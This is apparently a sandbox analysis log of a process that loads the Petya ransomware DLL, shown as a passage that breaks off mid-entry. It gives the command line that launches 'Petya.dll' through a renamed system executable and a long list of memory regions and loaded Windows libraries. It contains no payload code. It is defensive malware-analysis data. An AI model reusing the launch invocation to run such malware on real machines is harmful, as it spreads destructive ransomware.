# Flog Txt Version 1 # Analyzer Version: 2.1.0 # Analyzer Build Date: Jun 30 2017 16:09:33 # Log Creation Date: 30.06.2017 15:01:47.397 Process: id = "1" image_name = "agakmvmr.exe" filename = "c:\\windows\\syswow64\\agakmvmr.exe" page_root = "0x6fda1000" os_pid = "0x948" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Windows\\SysWOW64\\AGakmVMR.exe\" \"C:\\Users\\HJRD1K~1\\Desktop\\Petya.dll\" #1" cur_dir = "C:\\Windows\\system32\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e144" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 6 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 7 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 8 start_va = 0x1390000 end_va = 0x13adfff entry_point = 0x1390000 region_type = mapped_file name = "agakmvmr.exe" filename = "\\Windows\\SysWOW64\\AGakmVMR.exe" (normalized: "c:\\windows\\syswow64\\agakmvmr.exe") Region: id = 9 start_va = 0x770d0000 end_va = 0x77278fff entry_point = 0x770d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10 start_va = 0x772b0000 end_va = 0x7742ffff entry_point = 0x772b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 12 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 13 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 14 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 15 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 16 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 17 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 150 start_va = 0x230000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 151 start_va = 0x74710000 end_va = 0x7476bfff entry_point = 0x7474f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 152 start_va = 0x74770000 end_va = 0x747aefff entry_point = 0x7479de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 153 start_va = 0x74dd0000 end_va = 0x74dd7fff entry_point = 0x74dd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 154 start_va = 0x470000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 155 start_va = 0x74e70000 end_va = 0x74f7ffff entry_point = 0x74e832d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 156 start_va = 0x76b20000 end_va = 0x76b65fff entry_point = 0x76b27478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 157 start_va = 0x76eb0000 end_va = 0x76fcefff entry_point = 0x0 region_type = private name = "private_0x0000000076eb0000" filename = "" Region: id = 158 start_va = 0x76fd0000 end_va = 0x770c9fff entry_point = 0x0 region_type = private name = "private_0x0000000076fd0000" filename = "" Region: id = 159 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 160 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 161 start_va = 0x74e00000 end_va = 0x74e0bfff entry_point = 0x74e010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 162 start_va = 0x74e10000 end_va = 0x74e6ffff entry_point = 0x74e2a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 163 start_va = 0x75e00000 end_va = 0x75f5bfff entry_point = 0x75e4ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 164 start_va = 0x75f60000 end_va = 0x75ffffff entry_point = 0x75f749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 165 start_va = 0x76020000 end_va = 0x7610ffff entry_point = 0x76030569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 166 start_va = 0x76480000 end_va = 0x7657ffff entry_point = 0x7649b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 167 start_va = 0x76580000 end_va = 0x7661cfff entry_point = 0x765b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 168 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 169 start_va = 0x76940000 end_va = 0x769ebfff entry_point = 0x7694a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 170 start_va = 0x76b70000 end_va = 0x76b88fff entry_point = 0x76b74975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 171 start_va = 0x76bf0000 end_va = 0x76c7ffff entry_point = 0x76c06343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 172 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 173 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 174 start_va = 0x6b0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 175 start_va = 0x6c0000 end_va = 0x847fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 176 start_va = 0x762b0000 end_va = 0x7637bfff entry_point = 0x762b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 177 start_va = 0x76b90000 end_va = 0x76beffff entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 178 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 179 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 180 start_va = 0x850000 end_va = 0x9d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 181 start_va = 0x13b0000 end_va = 0x27affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 182 start_va = 0x74700000 end_va = 0x74702fff entry_point = 0x74700000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 183 start_va = 0x74ae0000 end_va = 0x74b23fff entry_point = 0x74af63f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 184 start_va = 0x74b30000 end_va = 0x74b63fff entry_point = 0x74b312ce region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\SysWOW64\\adsldpc.dll" (normalized: "c:\\windows\\syswow64\\adsldpc.dll") Region: id = 185 start_va = 0x74b70000 end_va = 0x74b7afff entry_point = 0x74b761ff region_type = mapped_file name = "dsauth.dll" filename = "\\Windows\\SysWOW64\\dsauth.dll" (normalized: "c:\\windows\\syswow64\\dsauth.dll") Region: id = 186 start_va = 0x74b80000 end_va = 0x74b8efff entry_point = 0x74b8125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 187 start_va = 0x74b90000 end_va = 0x74ba5fff entry_point = 0x74b9a6aa region_type = mapped_file name = "dhcpsapi.dll" filename = "\\Windows\\SysWOW64\\dhcpsapi.dll" (normalized: "c:\\windows\\syswow64\\dhcpsapi.dll") Region: id = 188 start_va = 0x74bb0000 end_va = 0x74bbcfff entry_point = 0x74bb12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 189 start_va = 0x74bc0000 end_va = 0x74bcefff entry_point = 0x74bc12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 190 start_va = 0x74bd0000 end_va = 0x74be8fff entry_point = 0x74bd1319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 191 start_va = 0x74bf0000 end_va = 0x74bf8fff entry_point = 0x74bf15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 192 start_va = 0x74c00000 end_va = 0x74c10fff entry_point = 0x74c01300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 193 start_va = 0x74c20000 end_va = 0x74c31fff entry_point = 0x74c21200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 194 start_va = 0x74c40000 end_va = 0x74c46fff entry_point = 0x74c4128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 195 start_va = 0x74c50000 end_va = 0x74c6bfff entry_point = 0x74c5a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 196 start_va = 0x74c70000 end_va = 0x74ccdfff entry_point = 0x74c77d39 region_type = mapped_file name = "petya.dll" filename = "\\Users\\HJRD1K~1\\Desktop\\Petya.dll" (normalized: "c:\\users\\hjrd1k~1\\desktop\\petya.dll") Region: id = 197 start_va = 0x75150000 end_va = 0x75d99fff entry_point = 0x751d1601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 198 start_va = 0x76430000 end_va = 0x76474fff entry_point = 0x764311e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 199 start_va = 0x76890000 end_va = 0x768e6fff entry_point = 0x768a9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 200 start_va = 0x76900000 end_va = 0x76934fff entry_point = 0x7690145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 201 start_va = 0x769f0000 end_va = 0x769f5fff entry_point = 0x769f1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 202 start_va = 0x76a00000 end_va = 0x76b1cfff entry_point = 0x76a0158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 203 start_va = 0x77280000 end_va = 0x7728bfff entry_point = 0x7728238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 204 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 205 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 206 start_va = 0x1a0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 207 start_va = 0x5a0000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 208 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 209 start_va = 0xf0000 end_va = 0xf6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 210 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 211 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 212 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 213 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 214 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 215 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 216 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 217 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 218 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 219 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 220 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 221 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 222 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 223 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 224 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 225 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 226 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 227 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 228 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 229 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 230 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 231 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 232 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 233 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 234 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 235 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 236 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 237 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 238 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 239 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 240 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 241 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 242 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 243 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 244 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 245 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 246 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 247 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 248 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 249 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 250 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 251 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 252 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 253 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 254 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 255 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 256 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 257 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 258 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 259 start_va = 0xe0000 end_va = 0x13dfff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 260 start_va = 0x75150000 end_va = 0x75d99fff entry_point = 0x751d1601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 261 start_va = 0x76890000 end_va = 0x768e6fff entry_point = 0x768a9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 262 start_va = 0x76a00000 end_va = 0x76b1cfff entry_point = 0x76a0158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 263 start_va = 0x77280000 end_va = 0x7728bfff entry_point = 0x7728238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 264 start_va = 0x74cb0000 end_va = 0x74ccbfff entry_point = 0x74cba431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 265 start_va = 0x769f0000 end_va = 0x769f5fff entry_point = 0x769f1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 266 start_va = 0x74ca0000 end_va = 0x74ca6fff entry_point = 0x74ca128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 267 start_va = 0x76900000 end_va = 0x76934fff entry_point = 0x7690145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 268 start_va = 0x74c80000 end_va = 0x74c91fff entry_point = 0x74c81200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 269 start_va = 0x74c60000 end_va = 0x74c70fff entry_point = 0x74c61300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 270 start_va = 0x74c50000 end_va = 0x74c58fff entry_point = 0x74c515a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 271 start_va = 0x74c30000 end_va = 0x74c48fff entry_point = 0x74c31319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 272 start_va = 0x74c20000 end_va = 0x74c2efff entry_point = 0x74c212a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 273 start_va = 0x74c10000 end_va = 0x74c1cfff entry_point = 0x74c112d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 274 start_va = 0x74bf0000 end_va = 0x74c05fff entry_point = 0x74bfa6aa region_type = mapped_file name = "dhcpsapi.dll" filename = "\\Windows\\SysWOW64\\dhcpsapi.dll" (normalized: "c:\\windows\\syswow64\\dhcpsapi.dll") Region: id = 275 start_va = 0x74be0000 end_va = 0x74beefff entry_point = 0x74be125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 276 start_va = 0x74bd0000 end_va = 0x74bdafff entry_point = 0x74bd61ff region_type = mapped_file name = "dsauth.dll" filename = "\\Windows\\SysWOW64\\dsauth.dll" (normalized: "c:\\windows\\syswow64\\dsauth.dll") Region: id = 277 start_va = 0x74b90000 end_va = 0x74bc3fff entry_point = 0x74b912ce region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\SysWOW64\\adsldpc.dll" (normalized: "c:\\windows\\syswow64\\adsldpc.dll") Region: id = 278 start_va = 0x76430000 end_va = 0x76474fff entry_point = 0x764311e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 279 start_va = 0x74b40000 end_va = 0x74b83fff entry_point = 0x74b563f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 280 start_va = 0x9e0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 281 start_va = 0xb00000 end_va = 0xdcefff entry_point = 0xb00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 282 start_va = 0x74b20000 end_va = 0x74b35fff entry_point = 0x74b22dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 283 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 284 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 285 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 286 